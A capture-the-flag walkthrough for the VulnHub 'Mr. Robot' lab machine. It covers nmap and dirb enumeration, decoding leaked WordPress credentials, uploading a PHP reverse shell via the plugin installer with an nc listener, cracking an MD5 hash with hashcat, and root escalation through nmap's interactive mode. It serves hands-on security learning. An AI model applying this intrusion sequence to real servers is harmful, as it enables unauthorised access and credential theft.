Mr. Robot is a Linux-based vulnerable machine available on VulnHub.com. According to the author, the machine has three hidden flags which get progressively harder to find. Mr. Robot is considered beginner/intermediate level, and doesn’t require any advanced exploitation techniques to conquer.
ENUMERATION
The Mr. Robot VM is running on a host-only adapter/network of 192.168.110.0/24. The machine is set up to pull an IP from DHCP when it boots. I know the DHCP range on this subnet is .200-.254, so I start with a simple nmap scan to discover the machine:
nmap -vv 192.168.110.200-254Results:
Scanning 192.168.110.201 [1000 ports]
Discovered open port 443/tcp on 192.168.110.201
Discovered open port 80/tcp on 192.168.110.201
Completed SYN Stealth Scan at 02:10, 4.97s elapsed (1000 total ports)
Nmap scan report for 192.168.110.201
Host is up, received arp-response (0.00077s latency).
Scanned at 2016-08-30 02:10:30 CDT for 6s
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT STATE SERVICE REASON
22/tcp closed ssh reset ttl 64
80/tcp open http syn-ack ttl 64
443/tcp open https syn-ack ttl 64Right away, we see the IP address of the machine is 192.168.110.201 and that ports 80 and 443 are open. Navigating to 192.168.110.201 in the browser, we find the interactive Mr. Robot website from the TV show, but nothing of real interest.
Now we’ll run DirBuster to try and enumerate the files/folders on the web-server:
dirb http://192.168.110.201And get a big list of results to look through:
---- Scanning URL: http://192.168.110.201/
==> DIRECTORY: http://192.168.110.201/0/
==> DIRECTORY: http://192.168.110.201/admin/
+ http://192.168.110.201/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.110.201/audio/
==> DIRECTORY: http://192.168.110.201/blog/
==> DIRECTORY: http://192.168.110.201/css/
+ http://192.168.110.201/dashboard (CODE:302|SIZE:0)
+ http://192.168.110.201/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.110.201/feed/
==> DIRECTORY: http://192.168.110.201/image/
==> DIRECTORY: http://192.168.110.201/Image/
==> DIRECTORY: http://192.168.110.201/images/
+ http://192.168.110.201/index.html (CODE:200|SIZE:1077)
+ http://192.168.110.201/index.php (CODE:301|SIZE:0)
+ http://192.168.110.201/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.110.201/js/
+ http://192.168.110.201/license (CODE:200|SIZE:309)
+ http://192.168.110.201/login (CODE:302|SIZE:0)
+ http://192.168.110.201/page1 (CODE:301|SIZE:0)
+ http://192.168.110.201/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.110.201/rdf (CODE:301|SIZE:0)
+ http://192.168.110.201/readme (CODE:200|SIZE:64)
+ http://192.168.110.201/robots (CODE:200|SIZE:41)
+ http://192.168.110.201/robots.txt (CODE:200|SIZE:41)
+ http://192.168.110.201/rss (CODE:301|SIZE:0)
+ http://192.168.110.201/rss2 (CODE:301|SIZE:0)
+ http://192.168.110.201/sitemap (CODE:200|SIZE:0)
+ http://192.168.110.201/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.110.201/video/
==> DIRECTORY: http://192.168.110.201/wp-admin/
+ http://192.168.110.201/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.110.201/wp-content/
+ http://192.168.110.201/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.110.201/wp-includes/
+ http://192.168.110.201/wp-links-opml (CODE:200|SIZE:227)
+ http://192.168.110.201/wp-load (CODE:200|SIZE:0)
+ http://192.168.110.201/wp-login (CODE:200|SIZE:2685)
+ http://192.168.110.201/wp-mail (CODE:500|SIZE:3064)
+ http://192.168.110.201/wp-settings (CODE:500|SIZE:0)
+ http://192.168.110.201/wp-signup (CODE:302|SIZE:0)
+ http://192.168.110.201/xmlrpc (CODE:405|SIZE:42)
+ http://192.168.110.201/xmlrpc.php (CODE:405|SIZE:42)We see that WordPress is installed. But before messing with that, it’s crucial that we go through every other file/folder and look for useful information. The first interesting file we find is 192.168.110.201/license. NOTE: At first glance, this page just has one line of text taunting us. Make sure you look at the ENTIRE THING!
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
~~snip~~
do you want a password or something?
~~snip~~
ZWxsaW90OkVSMjgtMDY1Mgo=At the very bottom of the file/page, we find what looks to be a base-64 encoded string. Let’s try decoding it in the terminal:
echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 -d
elliot:ER28-0652Looks like we’ve found some credentials. Maybe they’re for WordPress? We’ll save these and finish up with our enumeration and looting of the web-server’s files and folders.
FIRST FLAG FOUND
After continuing to look through the files and directories found by DirBuster, we make our way into the robots.txt file. In there, we find two very interesting files:
User-agent: *
fsocity.dic
key-1-of-3.txtThe fsocity.dic file appears to be a wordlist that we’ll hang on to just in case we need it later. When we navigate to http://192.168.110.201/key-1-of-3.txt, we find the first of three flags:
073403c8a58a1f80d943455fb30724b9WORDPRESS & GETTING A SHELL
With the first flag captured and the enumeration/looting of the webserver’s public files/directories complete, it’s time to take a look at the WordPress install. Using the elliot:ER28-0652 credentials we found earlier, we’re able to log into WordPress. It becomes immediately apparent that elliot is the administrator account:
Now that we have access to the WordPress administrator account, we should be able to set up a reverse-shell back to a listener on our attack machine. I used a php reverse-shell from PentestMonkey and uploaded it to the server through WordPress’ built-in plugin installer. However, in hindsight, I also could have used WordPress’ built-in file editor to insert some malicious PHP into one of the many WordPress .php files.
Before executing the code on the server, let’s first set up a listener on our attack machine:
nc -lvp 666
//Note:Make sure you set this to whatever port your shell is trying to connect back to. I used 666 in this example.With a listener running, we can now use the browser to navigate to the location of our shell code(http://192.168.110.201/wp-content/uploads/2016/08/shell.php) and hopefully get a shell on our attack machine:
With a shell established, let’s begin looking around. I tend to start in the home directory and in this instance we find a folder for a user named “robot”. Let’s cd into that folder and take a look if we can:
$cd /home/robot/
$ ls -asl
total 16
4 drwxr-xr-x 2 root root 4096 Nov 13 2015 .
4 drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
4 -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
4 -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5We find the 2nd key file, however we can’t read it due to the permissions. However, there is a file named password.raw-md5 that we can read:
$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13bIt looks to be the login and password hash for the user “robot”. Let’s place that hash in a text file on our attacker machine named hashes, and then use HashCat and the rockyou.txt wordlist to try and crack it:
hashcat -a 0 -m 0 hashes rockyou.txt
Initializing hashcat v2.00 with 2 threads and 32mb segment-size...
Added hashes from file hashes: 1 (1 salts)
Activating quick-digest mode for single-hash
c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz
All hashes have been recovered
Input.Mode: Dict (rockyou.txt)
Index.....: 1/5 (segment), 3627099 (words), 33550343 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 2.77M words
Progress..: 1853946/3627099 (51.11%)
Running...: 00:00:00:01
Estimated.: --:--:--:--So the password for user “robot” is abcdefghijklmnopqrstuvwxyz.
GETTING FLAG #2
When attempting to login as “robot” by using ‘su – robot’, I kept getting an error saying I could only execute this command from a terminal. I managed to get around this by borrowing the following command from g0tmi1k’s Basic Linux Privilege Escalation page:
python -c 'import pty;pty.spawn("/bin/bash")'Which then allowed me to login as robot:
daemon@linux:/$ su - robot
Password: abcdefghijklmnopqrstuvwxyz
$ whoami
robotNow that we’re logged in as robot, we can finally read the 2nd flag file:
$ cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959GETTING ROOT & FLAG #3
Escalating privileges to root on Mr. Robot was definitely challenging for me. After doing all sorts of enumeration and searching for exploits on exploit-db/etc, I was stuck. I finally asked a friend who had recently completed Mr. Robot for help. He told me that nmap was installed on the VM, and that I should look into that. After some Google searching, I learned that nmap’s interactive mode could be used to escalate privileges in certain scenarios.
From there, it was smooth sailing and I managed to quickly get root privileges and read the third and final flag file:
CONCLUSION
This was a fun machine overall and taught me a few things:
First: How easily an Admin account on WordPress can be leveraged to get a shell on a server.
Second: How important enumeration is to privilege escalation. Even though I thought I had looked at everything, I had missed a relatively simple escalation vulnerability.
Enumerate, enumerate, enumerate…And then Google everything you find.